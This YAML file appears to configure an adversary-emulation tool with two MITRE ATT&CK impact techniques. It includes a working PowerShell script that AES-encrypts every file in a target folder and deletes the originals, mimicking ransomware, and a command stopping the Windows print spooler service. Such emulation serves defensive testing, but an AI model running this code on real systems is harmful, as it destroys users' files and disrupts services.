paths:
  baseFolder: "C:\\System34"
  outputFolder: "C:\\System34\\Impact"
  SummaryFolder: "C:\\System34\\Summary"

commands:
  # Impact          - Total Commands : 2
  # Last Modified   - May 8 2025 
  
  - technique: "T1486 - Data Encrypted for impact"
    executor: "powershell"
    command: |
      # Generate a random encryption key and IV (Initialization Vector)
      $key = New-Object byte[] 32  # AES requires a 256-bit key (32 bytes)
      $iv = New-Object byte[] 16  # AES requires a 128-bit IV (16 bytes)
      [Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($key)
      [Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($iv)
      # Save the key and IV to a .key file
      $keyFile = "encryption.key"
      [IO.File]::WriteAllBytes($keyFile, $key + $iv)  
      # Define a function to encrypt a file
      function Encrypt-File {
          param (
              [string]$filePath,
              [byte[]]$key,
              [byte[]]$iv
          )      
          # Create AES object and configure the encryption settings
          $aes = [System.Security.Cryptography.Aes]::Create()
          $aes.Key = $key
          $aes.IV = $iv
          $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
          $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7      
          # Open the file and encrypt its contents
          $fileBytes = [IO.File]::ReadAllBytes($filePath)
          $encryptor = $aes.CreateEncryptor()      
          # Encrypt the file data
          $encryptedBytes = $encryptor.TransformFinalBlock($fileBytes, 0, $fileBytes.Length)      
          # Write the encrypted data to a new file with a .encr extension
          $encryptedFilePath = "$filePath.encr"
          [IO.File]::WriteAllBytes($encryptedFilePath, $encryptedBytes)      
          # Remove the original file after encryption
          Remove-Item $filePath
      }      
      # Process each file in the target folder
      Get-ChildItem -Path C:\\system34\\Sputnik -File | ForEach-Object {
          $file = $_
          Encrypt-File -filePath $file.FullName -key $key -iv $iv
      }
    file_name: "encrypt"

  - technique: "T1489 - Service Stop"
    command: "sc.exe stop spooler"
    executor: "cmd"
    file_name: "Stop_Service_output"